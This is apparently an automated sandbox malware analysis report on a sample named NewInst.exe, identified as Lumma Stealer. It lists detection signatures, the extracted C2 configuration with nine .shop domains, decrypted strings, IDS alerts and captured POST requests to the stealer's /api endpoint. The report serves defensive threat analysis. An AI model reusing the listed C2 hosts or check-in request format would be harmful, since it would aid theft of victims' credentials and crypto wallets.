Edit tour

Windows Analysis Report
NewInst.exe

Overview

General Information

Sample name:	NewInst.exe
Analysis ID:	1501436
MD5:	c2e7e93d02fa7cba953e3dd4463ba91b
SHA1:	ff908dd3556d49e45b2ef917f441a0035ac5aa97
SHA256:	4e62b2ec1f99fbfaab9b6a9253da40e00d4e5bf9cbecb29e6e77284af424d0d8
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

NewInst.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\NewInst.exe" MD5: C2E7E93D02FA7CBA953E3DD4463BA91B)

conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7640 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1764 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["stamppreewntnq.shop", "locatedblsoqp.shop", "froytnewqowv.shop", "condedqpwqm.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "traineiwnqo.shop", "caffegclasiqwp.shop", "stagedchheiqwo.shop"], "Build id": "1AsNN2--pp1337"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T22:59:00.462756+0200
SID:	2049812
Severity:	1
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T22:59:00.462756+0200
SID:	2054653
Severity:	1
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-08-29T22:58:58.728283+0200
SID:	2055478
Severity:	1
Source Port:	49543
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T22:58:59.391011+0200
SID:	2049836
Severity:	1
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T22:58:59.391011+0200
SID:	2054653
Severity:	1
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T22:58:59.995093+0200
SID:	2055488
Severity:	1
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-29T22:58:59.226042+0200
SID:	2055488
Severity:	1
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: NewInst.exe

Avira: detected

Antivirus detection for URL or domain

Source: millyscroqwp.shop	Avira URL Cloud: Label: malware
Source: stamppreewntnq.shop	Avira URL Cloud: Label: phishing
Source: condedqpwqm.shop	Avira URL Cloud: Label: phishing
Source: https://froytnewqowv.shop/	Avira URL Cloud: Label: phishing
Source: https://froytnewqowv.shop/apiv	Avira URL Cloud: Label: phishing
Source: caffegclasiqwp.shop	Avira URL Cloud: Label: malware
Source: froytnewqowv.shop	Avira URL Cloud: Label: phishing
Source: https://froytnewqowv.shop/api	Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop	Avira URL Cloud: Label: phishing
Source: stagedchheiqwo.shop	Avira URL Cloud: Label: phishing
Source: traineiwnqo.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 2.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["stamppreewntnq.shop", "locatedblsoqp.shop", "froytnewqowv.shop", "condedqpwqm.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "traineiwnqo.shop", "caffegclasiqwp.shop", "stagedchheiqwo.shop"], "Build id": "1AsNN2--pp1337"}

Multi AV Scanner detection for submitted file

Source: NewInst.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: NewInst.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: caffegclasiqwp.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: stamppreewntnq.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: stagedchheiqwo.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: millyscroqwp.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: evoliutwoqm.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: condedqpwqm.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: traineiwnqo.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: locatedblsoqp.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: froytnewqowv.shop
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: - Screen Resoluton:
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: Workgroup: -
Source: 2.2.RegAsm.exe.400000.0.unpack	String decryptor: 1AsNN2--pp1337

Source: NewInst.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: NewInst.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\muwoybn6mesz4\obj\Re\ease\ppZ.pdb source: NewInst.exe
Source:	Binary string: c:\muwoybn6mesz4\obj\Re\ease\ppZ.pdb0j source: NewInst.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-10h]	2_2_00433065
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi+edx+09h], 00000000h	2_2_0042E6A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0040F076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	2_2_004350C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea ecx, dword ptr [edx+edx*4]	2_2_004098D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	2_2_004190D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_004208D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0041B0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	2_2_0041B0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, dword ptr [esp+3Ch]	2_2_0041B0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_00419140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_00436140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	2_2_00404110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	2_2_00420110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	2_2_004369D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	2_2_0041A1D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	2_2_0041A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_004149A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_004149A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_004149A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+1Ch]	2_2_0041DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	2_2_0041DA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_0041DA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	2_2_0040F277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0041B280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	2_2_0041B280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0042A340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00432300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	2_2_00434B0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	2_2_00434B0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebx, dword ptr [esp+10h]	2_2_00421320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_0041A3C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	2_2_00410BEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	2_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 84AA3BD1h	2_2_004363F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004193A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp eax, 03h	2_2_00404460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_004144C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	2_2_00434CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	2_2_00434CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	2_2_004304B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	2_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	2_2_0042ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	2_2_0040BD2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+1Ch]	2_2_0041DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+esi+02h], 0000h	2_2_00415DA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_00420E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0041EE7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	2_2_00412E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+54h]	2_2_0041F6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	2_2_00434EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	2_2_00434EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi], 00000000h	2_2_00419E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_00419E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	2_2_0041FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+08h], ecx	2_2_00423FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	2_2_00423FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000000D8h]	2_2_00423FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_00423FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], al	2_2_00423FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	2_2_00423FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	2_2_00423FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+3Ch]	2_2_00423FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	2_2_00434FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, ecx	2_2_00411F94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_00435FA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055478 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop) : 192.168.2.4:49543 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055488 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055488 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop) : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: froytnewqowv.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: froytnewqowv.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=SfhHzATm1_X35cO.QY4Q0ZDZyFTO72B.imsig2iyZtI-1724965139-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: froytnewqowv.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: froytnewqowv.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: froytnewqowv.shop

Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000002.00000002.1940966413.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://froytnewqowv.shop/
Source: RegAsm.exe, 00000002.00000002.1940966413.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1940966413.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://froytnewqowv.shop/api
Source: RegAsm.exe, 00000002.00000002.1940966413.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://froytnewqowv.shop/apiv

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0042A0F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0042A0F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0042A0F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0042A0F0

System Summary

.NET source code contains very large array initializations

Source: NewInst.exe, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 273408

Source: C:\Users\user\Desktop\NewInst.exe	Code function: 0_2_021B0B20	0_2_021B0B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042F000	2_2_0042F000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040C9A2	2_2_0040C9A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00433D5A	2_2_00433D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042E6A2	2_2_0042E6A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040F076	2_2_0040F076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041401B	2_2_0041401B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004350C0	2_2_004350C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004098D0	2_2_004098D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004118E2	2_2_004118E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041B0F0	2_2_0041B0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0042D910	2_2_0042D910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004369D0	2_2_004369D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004149A0	2_2_004149A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041DA40	2_2_0041DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041DA60	2_2_0041DA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00407A20	2_2_00407A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406230	2_2_00406230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00408AC0	2_2_00408AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041B280	2_2_0041B280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00434B0F	2_2_00434B0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A3C9	2_2_0041A3C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00410BEB	2_2_00410BEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004363F0	2_2_004363F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00407390	2_2_00407390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041F440	2_2_0041F440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00404460	2_2_00404460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040D410	2_2_0040D410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00434CD0	2_2_00434CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004324E0	2_2_004324E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00402540	2_2_00402540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00434563	2_2_00434563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040BD2D	2_2_0040BD2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00411DC3	2_2_00411DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041D5E0	2_2_0041D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041CD90	2_2_0041CD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041DA40	2_2_0041DA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041EE7E	2_2_0041EE7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00406ED0	2_2_00406ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004356D4	2_2_004356D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004366E0	2_2_004366E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00434EE0	2_2_00434EE0
